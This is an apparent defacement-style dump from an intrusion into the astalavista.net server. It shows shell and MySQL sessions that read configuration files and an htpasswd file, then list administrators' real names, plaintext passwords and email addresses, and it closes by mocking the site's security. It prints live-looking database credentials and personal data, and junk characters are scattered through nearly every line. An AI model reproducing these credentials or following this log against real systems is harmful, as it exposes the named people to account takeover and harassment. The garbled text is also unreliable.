drwx–x–x  6 astanet astanet 4096 Dec 23 15:55 ." N$ v0 Z9 Z/ R  B; D( x
drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..& J: \5 G; H$ D0 w! v
drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth( V" e% [2 Y% ]2 \
-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history
$ Z& n# C# S/ R-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
( k8 c  j9 X! f: R0 b# U# M+ c5 V9 z-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile& u( Q0 t# h& k
-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc1 |+ C2 M; z$ s
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains( Q/ w+ p0 `) x7 o) E: C+ E0 |. F5 J
drwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
" |! ^& A$ Q3 W, qdrwx——  2 astanet astanet 4096 Dec 23 12:18 mail
$ I& n" A; v6 o, ~& O6 c9 R3 xlrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
) u: c5 _' r7 C- D0 J" m( `) X' q, _: a-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow/ J  H$ n/ `' E: a9 n; @* x$ y% x

9 I" ~* ^6 |$ Z+ M. lsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
; v# l9 r3 ~& Ish-3.2$ ls -la
7 C6 \$ R! V9 x# J! u" e9 J& vtotal 200
" S2 U3 w/ \7 H( gdrwxr-x— 29 astanet apache   4096 Jan  6 13:58 .2 r( P- y# x3 F0 t4 {
drwx–x–x  8 astanet astanet  4096 Dec 23 13:53 ..
" {* O  B8 _" o! f+ o) n% n$ edrwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007( S* T% i8 y7 d+ W6 g, z
drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql! {" ~  y" u1 m' F8 h
drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 链接标记astanet@astalavista.com  O. o' u. G$ ]+ V
drwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend: w$ Y  v8 j+ K) q5 J6 _: K2 F- w8 q
drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner
& q$ O7 l+ T& C& @9 o/ ~6 L# h-rw-r–r–  1 astanet astanet 25724 Apr  4  2006 banner.jpg
+ d$ q. x3 l0 [  }  D: i3 ndrwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config
" B" d& T, ]$ @( a& ndrwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron0 n2 ~1 @! h# u, G+ @4 x& v
drwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd* q; ?2 m6 ?! u( y: E- f
-rw-r–r–  1 astanet astanet    36 Jan  5  2006 error.php3 \9 C( w7 W7 b
-rw-r–r–  1 astanet astanet  1406 Jan  5  2006 favicon.ico+ A4 f8 `3 G4 ~. F0 d& G
drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed/ I5 O0 K6 h5 q5 C! D
drwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour1 Q; a. j; F/ h; l( \- X
-rw-r–r–  1 astanet astanet    18 Jan  5  2006 htaccess
9 y6 w; E& m5 |. y' d-rw-r–r–  1 astanet astanet   585 Mar 24 14:50 .htaccess
7 Z4 _  @" |0 D! \-rw-r–r–  1 astanet astanet   398 Jan  5  2006 index1.php
2 p( g% A! l- q- M; _-rw-r–r–  1 astanet astanet  1036 Jan  5  2006 _index.html) S& Z; \' |& r  ~
-rw-r–r–  1 astanet astanet  6880 Dec 23 14:44 index.php
5 N+ k$ Z% ~& }-rw-r–r–  1 astanet astanet   676 Mar 21  2006 index_redirect.php. e. m9 R) t: ~+ R6 x7 ~5 j+ c
-rw-r–r–  1 astanet astanet   739 Feb 24  2006 index.swf- d# B5 O& R" S' n" W7 a# i; Z
drwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc, I$ t( s, g' K& I
drwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
( L) |- |# `0 S5 V/ C9 \: a( zdrwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib' k- B( m6 B+ F
drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log( T9 \& R9 @/ |2 w0 O( A
drwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member2 Z+ _% W- k" b4 X" P1 z
drwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata
. q; b: e2 p# o& C' Mdrwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new, m3 u0 N; H; E4 y! V
-rw-r–r–  1 astanet astanet  7219 Feb 24  2006 pix1.swf
% W- S! i3 t3 t1 w+ u3 P/ ldrwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re
& H9 \9 d0 K0 Q# {: w1 i( S2 k-rw-r–r–  1 astanet astanet    23 Jan  5  2006 robots.txt/ Q2 P: n( b& k6 ^: F
drwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss
7 n- e1 U. @% V4 ~5 udrwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources
( P: s! t/ J+ Ndrwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com
, l2 j1 v8 p9 G+ I' @: ydrwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes6 w" {7 Y' m5 n$ h1 C
drwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src; T6 Y0 ^1 k( }: _& Z
drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl: U  S5 \( D, q+ V8 v
drwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2
+ @$ P0 H0 b8 C* Edrwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old9 M5 Q0 z4 s  Y8 @$ e
-rw-r–r–  1 astanet astanet    35 Dec  4  2006 webcash.php
6 g7 c7 b/ u' ~* n1 [, l2 Cdrwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki
8 D% I; S2 F& ~" K" p& {5 S3 b8 K, ^* q
sh-3.2$ head -20 index.php
) ]' X# l: E! c0 v5 L* ~<?PHP
4 T3 c( w$ c/ n* m/**) e/ ]% f5 j4 c6 q# j2 b3 S) f! y
* Mainfile (external) for astalavistaNET v2.0
) R% P: u! c: d! Z) A  O*
+ \2 }( Y$ s& \& Y* v/ V1 b. i! Y* @copyright     Astalavista IT Engineering GmbH
7 d4 X6 E4 v6 y" N* @author        Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>. ?. Z; \/ _4 w5 B1 n
* @version       1.0/ N- L, W/ M3 R, Z" X
*/
3 u% G" O5 R  g" ^/ k; ]" A0 [! f) C! L1 D/ w0 K
        if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
( F& F; {0 ]) I0 y: ^' {                $dontStartSession = false;
! Z# s) K5 h( p0 \        } else {
% M; h: Z2 c1 ]% J                $dontStartSession = true;
: A6 n& r1 z% _8 y8 D$ h: W        }
. R) Y9 `# S0 l' w        require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);& S7 _9 G+ _# J. @$ g; T
        require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);6 T2 ], |  N1 O( m
        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
$ {$ ^" D) u8 h        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);7 X% M" {+ S: E+ t) w

7 Q" d6 p! w) v1 i, d, \. csh-3.2$ cd config
  @- O* l  G: q3 q" wsh-3.2$ ls -la* _% M5 p9 z. ?6 a. [. Z
total 32
2 m7 ~, T& g- E; x9 idrwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .
7 j1 \* y3 n7 Vdrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..( m6 y, z4 y. K4 a3 o+ c& ^
-rw-r–r–  1 astanet astanet  987 Aug 11  2006 adm.conf.php/ c% Q& p3 l" P9 {% D% _: r
-rw-r–r–  1 astanet astanet 4937 Dec 23 15:48 com.conf.php$ |& x, i8 E5 I& r1 X
-rw-r–r–  1 astanet astanet  913 Aug 11  2006 cron.conf.php
- W: }  q: k8 O% r3 ]3 n7 K-rw-r–r–  1 astanet astanet 1668 Aug 20  2008 ext.conf.php
9 D. u. ]: Z, Z7 M  C8 Q4 j9 M-rw-r–r–  1 astanet astanet 2724 May 30  2007 int.conf.php, k2 u$ _" j7 h: }" B
0 `9 V" ^  \) r4 o3 v! L( S
sh-3.2$ cat com.conf.php
! u6 u+ g- D& x3 L[snip]
2 w, ], M9 G& g. l; F; U& z, h//member-database
' Q9 n  B$ i1 E6 j$_CONFIG['db_mem_server']       = ‘localhost’;
5 w( f- `2 }( T; `! e$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
& d) a9 i$ |% z& R; d/ c& E& `$_CONFIG['db_mem_user']         = ‘astanet_db’;# c" H9 o3 L% a4 @
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;$ V7 U% |$ Q4 a- e% p  w6 H
$_CONFIG['db_mem_debug']        = false; //true or false, G- S2 L2 v' E6 S6 R
//ads-database
5 w  V0 E8 u7 h' b: z) F# m% p- N$_CONFIG['db_ads_server']       = ‘localhost’;: G% L, j7 T: j0 U, O# ^
$_CONFIG['db_ads_database'] = ‘astanet_ads’;( a6 d6 z7 E% n5 n
$_CONFIG['db_ads_user']         = ‘astanet_db’;7 p  s  x" j1 B. S: \
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;' c8 g/ T: k  M$ M% M; J2 T% d; B
$_CONFIG['db_ads_debug']        = false; //true or false% H& N: j" V# D6 H% `
//rainbow-database  t) H) H  k. f1 q- i0 G! j
$_CONFIG['db_rainbow_server']   = ‘212.254.194.163′;1 a0 y: M+ N( Q
$_CONFIG['db_rainbow_database'] = ‘rainbow’;" d9 S) I: w) t# s! A
$_CONFIG['db_rainbow_user']     = ‘dinu’;1 Q1 h0 [. G" B* o# {
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
. p0 r" A) `6 |" s/ F: M0 w$_CONFIG['db_rainbow_debug']    = false; //true or false0 S. p& E) I% _1 O8 d
//mailing lists database
1 Q) a) p4 k5 l- p; j6 r" B7 w$_CONFIG['db_mailing_lists_server']     = ‘localhost’;& ~% j% A$ `. W8 {3 A$ K
$_CONFIG['db_mailing_lists_database']   = ‘astanet_mailing_lists’;6 M, G: W% c+ n" J' t0 [
$_CONFIG['db_mailing_lists_user']               = ‘astanet_db’;5 _# T: k7 s# x$ y
$_CONFIG['db_mailing_lists_password']   = ‘TXwVrC7hbq’;0 B3 J9 l- l7 w4 U& S2 Z- K8 C9 g
$_CONFIG['db_mailing_lists_debug']              = false; //true or false8 L& z% W7 `+ c( p' l1 ~
//paypal
  v& j: ]- q+ n6 L; T% C. t$_CONFIG['sub_pp_url']          = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
* V8 {3 P/ S; o& e9 l. N% m$_CONFIG['sub_pp_cmd']          = ‘_xclick’;
2 z, d3 B5 R0 z) E$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;2 d( L8 ~: z4 q. y3 C  `) d
$_CONFIG['sub_pp_noship']       = ‘1′;$ H% s0 b2 X( r! u
$_CONFIG['sub_pp_referer']      = ‘链接标记[url]https://www.paypal.com/[/url]’;8 s) S8 k# p( A3 [5 M" v2 x
[snip]1 {: o7 H/ ^0 Q8 z

5 g% Q0 K/ {& C/ W! o& nsh-3.2$ cd ..! q3 i' a2 n5 U. y
sh-3.2$ cd member
: ?  f& U7 D. r7 d$ ash-3.2$ ls -la
' T* K( w! x. i5 O7 G! ~total 20" ^5 ~$ N8 Z  _; f8 O
drwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .( U/ c  H" }4 k; j  `( T
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..6 {" c2 T( o: @  k
-rw-r–r–  1 astanet astanet   19 Jan 13 14:02 .htaccess; @8 I3 s" B, m9 Y# Z6 x1 i
-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php
5 n% }8 i" q+ `6 G. k$ J% jsh-3.2$ cat .htaccess: p  }5 F( a3 k8 ?6 ]' q
SecFilterEngine off" e+ O" C! A" X: P( n9 H

$ F" q; _$ D7 D7 s. W1 ?sh-3.2$ cd ..2 |& A9 ]8 ^% V$ X1 y% {6 ?2 G! k
sh-3.2$ cd cron: e* q5 t; a. y3 Q6 V* L( F
sh-3.2$ ls -la
6 k4 i; A% d' J3 ~( Gtotal 168
# \6 x9 V4 g4 Q, Bdrwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .
4 S0 x  Z2 ]* d$ [5 R' f, d( [$ wdrwxr-x— 29 astanet apache   4096 Jan  6 13:58 ..
! A% ]( j8 f( d# k1 h-rw-r–r–  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php- Q: E& d* G: l) o8 H# W  f
-rw-r–r–  1 astanet astanet  2356 Aug 11  2006 0_functions.php
- s$ L0 @# ~+ x* Q9 b% b-rw-r–r–  1 astanet astanet  3616 Dec 23 15:44 1_daily.php
6 F" i6 D* R9 B$ S  \0 J-rw-r–r–  1 astanet astanet   527 Aug 11  2006 1_fivemin.php6 w$ {- G! B  G. M8 ~/ _
-rw-r–r–  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php
. c, w9 x5 j: `/ L3 ?! z# |9 v& I-rw-r–r–  1 astanet astanet   432 Aug 11  2006 1_weekly.php% M0 S/ ~( l9 k1 T
-rw-r–r–  1 astanet astanet  2277 Aug 11  2006 2_advertising.php
) u: L5 m) r6 }# j% a6 f/ Z! U1 y% _2 M-rw-r–r–  1 astanet astanet  4882 Dec 23 15:40 2_archives.php8 a, I! H( I- q( j3 t3 ~* o
-rw-r–r–  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh
; N- B) L6 W8 ^-rw-r–r–  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php0 u6 ^5 n  x  A2 K1 p
-rw-r–r–  1 astanet astanet 14979 Jan 12 09:10 2_expire.php, e/ T, w4 T& t$ l" J% r8 A
-rw-r–r–  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php: Z4 J$ Q$ e' T9 \1 C
-rw-r–r–  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh# R* P4 {% j- w
-rw-r–r–  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php
" c0 i& d6 t) e+ P0 \5 a( ]/ s-rw-r–r–  1 astanet astanet 15664 Sep 22  2006 2_keywords.php
  r4 m1 C# v! P-rw-r–r–  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php
( s& s9 V  t& L2 A* G-rw-r–r–  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php! |$ s/ }% \) z
-rw-r–r–  1 astanet astanet   796 Aug 11  2006 99_create_emails.php8 Q! M6 F' }( J  m3 s2 b, N7 O; k
drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
( ^5 m4 G' Y+ k7 I! }$ q7 g-rw-r–r–  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php
# y7 T  L% w" _, b-rw-r–r–  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php' _* `) C! u) F" g( x

" M: E3 x' N- c2 {' l: Ysh-3.2$ cd ..) R* l% h/ s$ ~  U- w# r
sh-3.2$ cd _007) \0 U% `4 Z- D5 J. I
sh-3.2$ ls -la
4 m0 y3 u& t( z* S6 D/ o9 Ntotal 24- M, V5 m' P/ u/ i/ u& E6 c
drwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 ./ F9 T& C4 y$ ~/ Z
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..0 j' Y5 _6 r. l' G3 \
-rw-r–r–  1 astanet astanet   96 Dec 23 15:17 .htaccess
3 T) [# E3 D- J-rw-r–r–  1 astanet astanet 3263 Jan 15  2007 index.php
/ p' C2 p1 |0 g1 f: b1 ~6 B. L-rw-r–r–  1 astanet astanet   20 Dec 27  2006 info.php
: l: f7 f0 E+ wdrwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap& z: r) p6 q6 P1 e
8 G+ D9 i, Q+ o6 W
sh-3.2$ cat  .htaccess/ u; `9 C  N2 U; @& T% z
authType Basic0 d5 B( U. S, ]
authName Admin( K0 l) z  [+ F6 G% @; Z+ G& d* |, Z4 b
authUserFile /home/astanet/auth/.htadm_pwd0 B! `+ {' ?& o1 m! e; i$ m% J
require valid-user
6 I) v) V3 k5 @: I! M/ i2 c
. I8 Q" |# r+ ~6 W! F' h. Osh-3.2$ cat /home/astanet/auth/.htadm_pwd
7 k" u7 l7 p$ g4 W. H/ R4 u2 ^, {2 Fadmin2net:CR0bl65MwhfT/ \9 m, K5 f  T* J( y

/ J- O, a) Q9 \8 vsh-3.2$ mysql -u astanet_db -p( q& f. M6 a6 h+ d9 ^8 v
Enter password:
; d0 g6 l8 F. A, m- m# VWelcome to the MySQL monitor.  Commands end with ; or \g.
' @, V, [. U. Q5 H. `7 ]. D# lYour MySQL connection id is 275153, a7 S" c, s' c! L: Q, ^9 |
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
9 ~5 L: }2 m' Q) E+ A; }6 \9 d  g3 ]6 O* r
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.* }- B+ G) {0 u% \/ S' C1 D4 g$ u% r
) k4 b" d7 H. d5 Z: r
mysql> show databases;# n2 c+ b3 a( {9 e) Z: u- f# X
+———————–++ p3 ]1 Q) h$ J" s* |
| Database              |
' U2 y" }* S2 E; I# T+———————–+- s6 R. G; F: l
| information_schema    |0 D8 C: b$ z$ R0 m0 I# T! \. E9 }
| astanet_ads           |
- C) r2 W! d3 M" z  Q$ ^2 n8 A| astanet_mailing_lists |
$ S- p- F; v% O  m" C% r8 q; ?| astanet_mediawiki     |
' [* {1 b( O3 m3 J| astanet_membersystem  |
# b8 a& Z  m( o- ?! Z$ v| test                  |
5 f# Y% G  U' f4 j2 `1 i. [8 C5 W! j+———————–+
/ f! J& _% \+ d6 Z8 d4 H8 t6 rows in set (0.00 sec)! M# T0 u' ?  V& O' X) ?) u
9 U* y2 `% ^" _3 Q. q" O! [
mysql> use astanet_membersystem
6 H4 \& q) }; z" ]5 LDatabase changed
. r  \& S6 {, _" W" S5 ~2 kmysql> show tables;8 u% P/ y7 o( Y* L( t$ X; H- b7 \
+———————————–+' ]! D1 n$ ~5 e5 d
| Tables_in_astanet_membersystem    |
4 B# f3 ?- E- g- x6 c+ q8 K+———————————–+
& P7 ^+ s4 _. i& b| blacklist_categories              |
+ u; C' c( j7 L' ~( S| blacklist_content                 |& X- a3 S% H* l3 V6 d& F2 {
| blacklist_levels                  |6 n2 F5 C2 y9 ^$ t. Z+ B
| blacklist_mcset                   |8 D6 y  ]  r3 u$ n
| dir_categories                    |
+ |1 i9 G2 c% I: g| dir_comments                      |
) g' y0 q7 F, p' k6 b  W| dir_links                         |; K# h) A# |. {6 A
| dir_temp                          |8 o/ A# g8 c3 ?$ j' x
| dir_votes                         |' b) |! U+ u4 w# m3 _; i* i
| documents                         |
. y% n3 A5 W  |  x- d' N| documents_categories              |2 ^$ x4 [3 j1 S3 \( o3 X
| email_content                     |7 s9 ^2 ^' v7 I( w' ^1 }4 B
| email_settings                    |6 B5 S' {7 R( h5 L# Q
| exploits                          |% o1 k2 g+ {, G: H3 h2 Y
| exploits_categories               |* m/ H) l8 h4 _/ h
| exploittree_categories            |
( K. p& i. U/ e0 B. `& W/ I| exploittree_exploits              |
! i% ?% }0 V. y5 V% T| home_values                       |
1 P9 N- @- q' M2 f+ Y3 O% G" ]# h| iso_countries                     |+ a3 [7 s- u7 N6 j) }
| links_categories                  |
% b# R' Z3 k% r6 @! M| links_records                     |
  O7 X) K; w$ {1 k, P; U| links_unauth                      |, S, j4 P% \0 K+ K2 }) y  E
| links_votes                       |3 y/ ]$ x3 T& [) J( \, V
| log                               |
4 w2 S9 B/ g/ }' P| news_categories                   |  N) @$ o3 U: y, g  t# Q" Y
| news_comments                     |$ s6 a0 D# y3 p1 [7 M, y4 D$ ^4 w
| news_emoticons                    |, ], u: Y$ C$ H& R# s
| news_latest                       |! o- \; b/ K' N
| news_messages                     |3 W# ~9 X/ F( s# B
| news_statistics                   |6 S1 I  N  k% @! x6 e' @+ m) j
| news_votes                        |
+ D2 ^. `! ^  i4 Q+ K- c) x' U| prices_content                    |( I4 y5 ]3 Q$ U9 p+ u1 o0 O4 Q
| prices_offers                     |0 V( _& o7 Y) l% N- s" c, Y4 Q/ L
| rss_settings                      |
* R" X5 }2 D' t9 x- Z| sessions                          |4 H" d3 r% M7 e5 b9 ]( j
| stats_signups                     |% R0 h  w2 Q, X- c& V( w
| u2u2                              |
! t3 r1 x" P+ U. z! ~| u2u_contact                       |
# c3 d9 x) u( h| u2u_settings                      |8 a, h( @6 ~7 k
| user_keywords_selected_categories |5 a+ L! u0 K. \2 ]
| users                             |6 _' r1 n% l/ w, @/ ]9 o9 F& h) T
| users_ipn_test                    |! G& K1 O1 i. ~& Z7 q- A+ c
| users_keyword_values              |
2 N( L: D& U  k: z8 i- ~' Q3 |/ v8 Z| users_profile                     |$ x& b- ]5 o/ D/ g2 ]( a' `
| users_temp                        |
2 O' p; _9 L5 h/ Z| users_upgrade                     |8 `4 }2 u! r. e/ {8 r8 u, o: A! h
+———————————–+
& T+ K) A( b) ?9 p1 J: d% U* w46 rows in set (0.00 sec)
" o, m# H5 T0 R5 K9 b5 W) r- l8 f0 x: k6 d3 s* ~7 _8 ~% h8 ^/ G
mysql> describe users;
/ B. \+ ]" n& w! U5 Q3 X/ C+————————–+————————————–+——+—–+———————+—————-+% x* }1 b5 U; o4 O# l. T
| Field                    | Type                                 | Null | Key | Default             | Extra          |
# e# w7 _5 O6 ], @: H+————————–+————————————–+——+—–+———————+—————-+. f- p0 Z' v8 x9 E9 m+ k+ Z8 e
| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |
" q7 ~. \: {/ M/ ^  \7 ^# m| user                     | varchar(50)                          | NO   |     |                     |                |$ l+ S2 P  u3 t
| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |
$ \3 t* {* ?: d; R| password                 | varchar(30)                          | NO   |     |                     |                |! ~1 d; E+ ?. g9 w) [
| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |6 n: G: |/ x( |
| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |9 b, T, m: A! {6 j! W  {+ {
| email                    | varchar(50)                          | NO   |     |                     |                |
5 [3 x, P" U" N| ip                       | varchar(15)                          | NO   |     | 0                   |                |2 z& r0 d( i: C  q5 c& o* \0 J
| proxy                    | set(’0′,’1′)                         | NO   |     | 0                   |                |2 k! Q1 |1 }) `% G& l" d) D( P
| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |7 O, H7 [. d0 V8 Z' f
| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |
4 {0 {2 u- A- L% V- i/ p; || anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |) Q3 T2 u2 @: K  `
| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |$ T7 U7 W+ m3 E' w. l, y# j3 `
| checked                  | set(’0′,’1′,’2′)                     | NO   |     | 0                   |                |! m6 ~- n/ G9 o4 I2 P
| freemember               | set(’0′,’1′)                         | NO   |     | 0                   |                |' n% O1 O  N8 G2 V) j( T- T" v
| ordertype                | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES  |     | NULL                |                |
  Y+ }% Q) n+ E5 B| lang                     | tinytext                             | NO   |     |                     |                |( \1 @$ v1 q  D( j; H9 m) A5 F
| adid                     | smallint(6)                          | NO   |     | 0                   |                |
9 W1 U- R4 a( `| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |
# d/ o% _4 ~. |# J| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |! N  G- M# d& k7 |- X
| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |* y, z$ J  h5 E* Z7 I& n
| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |" w' x- n, \, \) d0 d: i
+————————–+————————————–+——+—–+———————+—————-+
: x" y  O! w, ~4 y8 [8 b22 rows in set (0.01 sec)
8 b9 X# d" V, `4 ?* k$ ^
9 N2 b+ O2 H. a1 nmysql> select count(*) as skids from users;
/ _% J' ]) D; y9 I9 U* N+——-+
+ d! J1 o/ K' D- u( |4 ~+ r; || skids |8 `2 ]  X* K% Y/ {3 r; I
+——-+( U1 f7 j- c4 H" z/ H
| 25199 |2 n1 X! T5 M1 `/ \8 }
+——-+
3 ^# Z# |  S" U* S; n& h* @# L$ H1 row in set (0.00 sec)
+ d. J$ i# W( [& o5 j  B. j$ H9 i$ i: J* r+ K/ \+ j
mysql> select user,nickname,password,email from users where userlevel = 1;
" T* ~3 {2 \4 p& O" a+ ]' S9 c+————————–+———————-+——————+———————————–+, L( q7 w; @" D* K
| user                     | nickname             | password         | email                             |7 J' Y. S9 y  r& h, w6 ~/ M  p
+————————–+———————-+——————+———————————–+- I( |$ l8 k) u# A
| pascal                   | prozac               | astaman3         | 链接标记info@astalavista.net              |
. N' _1 g/ g5 d2 x| Ivan Schmid              | rOOtless1            | astalavista4asta | 链接标记ivan.schmid@comvation.com         |# P* T* v% d& X" E0 |
| qreymer                  | Palermo              | qblsw85iam       | 链接标记eche@home.se                      |* E+ X! X8 n1 X" v: W
| Christian Wehrli         | g0atherd             | hitt?74          | 链接标记g0atherd@gmx.net                  |% ^9 O" j  b" _3 S. Q( @8 j% T
| Andrew Blake             | Minky                | liq73uid         | 链接标记a.blake@har.mrc.ac.uk             |
+ s' Q; r& |& z6 I1 I- S& g) e| Martin Wyss              | dinu                 | kj63;cXy         | 链接标记martin.wyss@astalavista.net       |
4 H2 ?- k" R$ Q- e6 }8 o| Leandro Nery             | Timan_no_Sanco       | nery2002         | 链接标记leandronery@hotmail.com           |
: x3 L: K6 e9 \| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | 链接标记shavingryansprivates1@hotmail.com |0 }; D$ \- t4 R4 K! o( h! c  e
| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | 链接标记spoofedexistence@hotmail.com      |: r4 m$ ~  G' d( L( K
| David M Lee              | Daremo               | icG12m03         | 链接标记daremo@hackerheaven.com           |
' A; x, j" \. D/ ^- I/ h1 \4 Q2 V| David Corn               | akriel               | ve3uB$cUku       | 链接标记akriel@fallenroot.net             |
' c; ^+ K8 z7 J( K% A| Thomas Kalin             | Gwanun               | QwErTy123        | 链接标记thomas.kaelin@astalavista.net     |* g  \+ P% n, o7 k6 P
| Marcus unknown           | Cra58cker            | hhCr4ck06        | 链接标记unknownmarcus@hotmail.com         |
2 ]  h# @- @4 }8 v4 C| David Ellis              | dellis203            | philip           | 链接标记dellis@nightwatchnss.com          |; A1 I: ^2 a# s( w; S
| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | 链接标记xeor@hush.com                     |
; j; Z3 n1 V' {% h( i| Paulo Santos             | Be1er0ph0r1          | amor01           | 链接标记pmsantos@gmx.ch                   |
3 b& A" T' z! C! C; E2 g  Y" A| Thomas D?ppen            | daha                 | asta4tom         | 链接标记thomas.daeppen@astalavista.ch     |5 S3 o& a) d8 T5 r! L8 Z6 E
| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | 链接标记toraj.a.m@gmail.com               |
; K; e% Y9 z( D8 `1 {' i| Fabius Bernet            | traviser             | wellenreiter100  | 链接标记fabius.bernet@astalavista.ch      |: y1 r4 |. ~2 s4 O# w# m
| Zachary McElroy          | duder1               | dirty245dix      | 链接标记mcelroyzj@yahoo.com               |' J8 q# v/ a# j  X" `1 S( C0 O- b' t1 b* T
| Leron Cohen              | cohen2               | leron4free       | 链接标记leron@quiredmedia.com             |
& G# n' Q9 f7 l- x  W# R8 f/ z| Beatriz Pontes           | anonymous1656        | pitas            | 链接标记joao.pedro.pontes@gmail.com       |" j2 a2 e7 z' Z
| Glafkos Charalambous     | anonymous2086        | si99490178$#     | 链接标记nowayout@webhostline.com          |
3 N' Y% ^% \. q9 N4 [| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | 链接标记ivan.schmid@astalavista.ch        |3 ]4 l# o5 P) M# B! \
| Peter Fisher             | cyph3r1              | testZer025435    | 链接标记cyph3r@astalavista.com            |$ j3 H7 D% q8 @; }
| sykadul                  | sykadul              | ak29eral         | 链接标记sykadul@gmail.com                 |) S6 O; I! F7 X) P; n4 Z& Y
| Ronny Janzi              | commander1           | mpbdaagf6m       | 链接标记ronny.janzi@astalavista.ch        |
$ A4 h! G4 d* p* n+————————–+———————-+——————+———————————–+
  m' Q6 n  {: U. a( E8 b0 j27 rows in set (0.00 sec)
  u& _; [6 l: Z2 }3 D2 {5 f' q
' D7 j8 f/ I) C$ lmysql> exit;7 x& l' ]2 c+ [; y0 s: ^
Bye
4 _- z: v  e. Q2 p, l
: O& p9 ^% f0 Z" p8 P# t% G$ d" [[~] plaintext passwords? yes,) V/ ]! f. Z3 K) R7 B) {
Those so called “security professionals” who charge you $6.66 / month to
; [' |( W* Z6 q2 z0 {; M% kregister at their hack-proof portal, save your passwords in plaintext…
4 S/ f( n/ o$ I7 X8 Z0 I9 bbrilliant!
8 [0 n2 G/ s9 k9 f! x& e+ n0 p
; X, e% Y' ^! R- T1 z; ^[~] This been fun but we want more.
